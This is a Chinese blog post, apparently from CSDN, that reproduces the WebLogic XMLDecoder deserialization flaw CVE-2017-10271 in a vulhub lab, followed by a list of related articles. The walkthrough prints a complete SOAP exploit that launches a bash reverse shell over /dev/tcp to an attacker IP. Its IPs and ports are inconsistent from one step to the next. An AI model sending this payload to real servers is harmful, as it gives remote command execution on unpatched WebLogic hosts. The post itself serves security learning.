Weblogic XMLDecoder反序列化漏洞(CVE -2017-10271)复现

已于 2023-08-11 15:26:04 修改
阅读量86 收藏
点赞数
文章标签: web安全 linux
于 2023-08-07 20:55:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68471358/article/details/132154514
版权

漏洞原理

本文介绍了Weblogic XMLDecoder反序列化相关的漏洞原理,并以CVE-2017-10271为例在vulhub上进行了复现。有关Weblogic XMLDecoder反序列化漏洞包括CVE-2017-3506、CVE-2017-10271、CVE-2019-2725、CVE-2019-2729等,其漏洞原理相似,这里首先简要介绍Weblogc XMLDecoder相关的背景知识 。

Weblogic

用途:用于解析java,部署大型分布式Web应用的Web中间件。

默认端口:7001

历史漏洞:XMLDecode反序列化漏洞、反序列化漏洞、弱口令war包上传、SSRF等本文仅介绍XMLDecode反序列化漏洞

XMLDecoder是干啥的?

XMLDecoder/XMLEncoder 是在JDK1.4版中添加的 XML 格式序列化持久性方案,使用 XMLEncoder 来生成表示 JavaBeans 组件(bean)的 XML 文档,用 XMLDecoder 读取使用 XMLEncoder 创建的XML文档获取JavaBeans。总之就是用来解析XML文档的。

Weblogic XMLDecoder 反序列化漏洞原理简介

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XM(SOAP协议)数据,在解析的过程中出现反序列化漏洞,导致任意代码执行。出问题的包是wls-wsat、_async

漏洞复现(CVE-2017-10271)

复现过程(vulhub)

本文以CVE-2017-10271为例,用vulhub靶场进行漏洞复现,目标是获取反弹shell。

靶机:39.106.14.43

攻击机:kali 192.168.200.131

攻击机和靶机无所谓是不是kali和Ubuntu,攻击机用于接收反弹shell,靶机应该是Ubuntu上启动的docker。首先启动vulhub靶场,cd vulhub/weblogic/CVE-2017-10271,然后执行如下命令启动:

docker-compose up –d

docker ps查看进程,已经成功启动,端口为7001

浏览器访问靶机ip:7001,可看到如下的404页面,说明环境搭建成功。

weblogic XMLDecoder反序列化漏洞的出现位置有很多路径,具体路径我们在漏洞原理部分已经给出,这里就选第一个好了/wls-wsat/CoordinatorPortType,浏览器访问192.168.200.129:7001/wls-wsat/CoordinatorPortType,页面如下:

把访问这个可能触发XMLDecoder反序列化漏洞的页面的GET请求抓下来(BurpSuite抓个包),可以看到其HTTP请求如下图:

把这个包发送到重放器Repeater,一会改包添加poc。现在我们在攻击机kali中开启一个nc监听,监听7777端口,用于接收反弹shell(读者也可以选择其他端口)

改包,把刚才抓到的HTTP GET请求,修改请求方式为POST,然后加上反弹shell的恶意代码,注意要把Content-Type修改为text/xml 。

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">  
  <soapenv:Header> 
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">  
      <java class="java.beans.XMLDecoder">
        <object class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0"><string>/bin/bash</string></void>
            <void index="1"><string>-c</string></void>
            <void index="2"><string>bash -i &gt;&amp; /dev/tcp/192.168.219.134/4444 0&gt;&amp;1</string></void>
          </array>
          <void method="start"></void>
        </object>
      </java>
    </work:WorkContext> 
  </soapenv:Header>  
  <soapenv:Body/> 
</soapenv:Envelope>

完整的请求包如下:

把反弹shell的ip改成你的接收反弹shell的ip,端口改为刚才nc监听的端口。 改包之后,发送请求,响应包的状态码是500,如下图所示,如果响应包如下图这样,漏洞利用就成功了。

重楼学网安
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebLogic反序列化漏洞复现+利用工具(CVE-2021-2394)
0xSec
04-08 4145
Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271复现)
薛定谔嘚喵博客
05-07 602
CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。漏洞触发url漏洞本质:主要是由于wls组件使用了webservice来请求soap请求,所以通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令。
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271
huangyongkang666的博客
07-25 1223
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271
CVE-2017-10271(WebLogic XMLDecoder反序列化漏洞)
deginner2的博客
07-29 4796
CVE-2017-10271(WebLogic XMLDecoder反序列化漏洞)
Weblogic反序列化漏洞CVE-2017-10271
qq_58000413的博客
10-15 414
Path weblogic/CVE-2017-10271 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。漏洞的产生感觉都是由于过滤的不严谨,以后找漏洞我们可以注重没有过滤的地方,毕竟这么多的代码,总会有疏忽的地方。漏洞产生的原因是因为在调用,xml的时候没有做过滤,从而导致漏洞的产生。3.查看DNSLOG发现,存在访问,则漏洞存在。1.找到存在漏洞的页面。
【网络安全---漏洞复现Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271
m0_67844671的博客
09-13 516
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271);​ Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
Weblogic CVE-2017-10271 XMLDecoder反序列化漏洞
读书 买花 长大
02-17 432
CVE-2017-10271
Weblogic XMLDecoder反序列化漏洞复现(CVE-2017-10271)
又菜又爱倒腾的博客
10-29 998
#Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)# 一、漏洞简介 weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 二、漏洞影响 影响版本 10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0 三、产生原因 CVE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执
CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞
m0_58596609的博客
12-09 2011
CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞
WebLogic-XMLDecoder(CVE-2017-10271)反序列化漏洞分析及复现
人若无名,便可专心练剑
04-13 1413
下面的内容主要是给师傅们介绍和讲解下weblogic XMLDecoder漏洞,这个漏洞有很多个版本,有多个cve漏洞,这里我主要从基于IDEA和vulhun环境搭建来给师傅们复现下这个weblogic XMLDecoder漏洞复现完成的师傅们,要是基础还可以,学过Java代码的可以尝试掌握下这个漏洞的POC构造,这个是底层代码原理,比较难,小白的话把漏洞原理以及漏洞复现完成即可!!!
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
Weblogic+XML反序列化漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
Weblogic反序列化漏洞补丁(FMJJ),这是一个累积补丁,代号FMJJ
Weblogic XML反序列化漏洞CVE-2017-10271
04-16
Weblogic XML反序列化漏洞CVE-2017-1027
Weblogic漏洞CVE -2017-10271解决方案-附件资源
03-02
Weblogic漏洞CVE -2017-10271解决方案-附件资源
【网络安全的神秘世界】在win11搭建pikachu靶场
最新发布
weixin_54750312的博客
05-31 632
这个错误发生在mysql 5.7 版本及以上版本会出现的问题,在mysql5.7版本默认的sql配置是:sql_mode=“ONLY_FULL_GROUP_BY”,这个配置严格执行了"SQL92标准",很多从5.6升级到5.7时,为了语法兼容,大部分都会选择调整sql_mode,使其保持跟5.6一致,为了尽量兼容程序。访问http://pikachu/install.php,这是pikachu自带的初始化数据库的php文件。ok,重新访问首页(index.php),进行测试,成功解决。点击“安装/初始化”
web安全渗透测试工具篇(二):sqlmap常用命令和nmap常用命令
HACKONE的博客
05-26 230
这些选项可以用来创建用户自定义函数。--udf-inject 注入用户自定义函数--shared-lib=SHLIB 共享库的本地路径。
网络安全||信息加解密技术以及密钥管理技术
2401_84434570的博客
05-31 620
IDEA:128位密钥、64位数据块、比DES的加密性好、对计算机功能要求相对低,PGP。对称加密(又称为私人密钥加密/共享密钥加密):加密与解密使用同一密钥。非对称加密(又称为公开密钥加密):密钥必须成对使用(公钥加密,相应的私钥解密)。:高级加密标准,又称Rijndael加密法,是美国政府采用的一种区块加密标准。,现在通用的证书一般采用UTC时间格式,它的计时范围为1950-2049;:替换+移位、56位密钥、64位数据块、速度快、密钥易产生。2048位(或1024位)密钥、计算量极大、难破解。
【网络安全的神秘世界】docker介绍及安装教程
weixin_54750312的博客
05-31 296
Docker官方文档Docker提供了一种轻量级、便捷、高效的方式来打包、部署和管理应用程序及其运行环境容器:应用及其所需环境的打包镜像:是容器的模板仓库:用于存储和共享镜像。
Weblogic IIOP反序列化漏洞(CVE-2020-2551)
07-28
关于Weblogic IIOP反序列化漏洞CVE-2020-2551),以下是一些相关信息: CVE-2020-2551是Weblogic Server的一个严重漏洞,该漏洞允许攻击者通过发送特制的T3协议请求来执行任意代码。这个漏洞属于Java反序列化漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值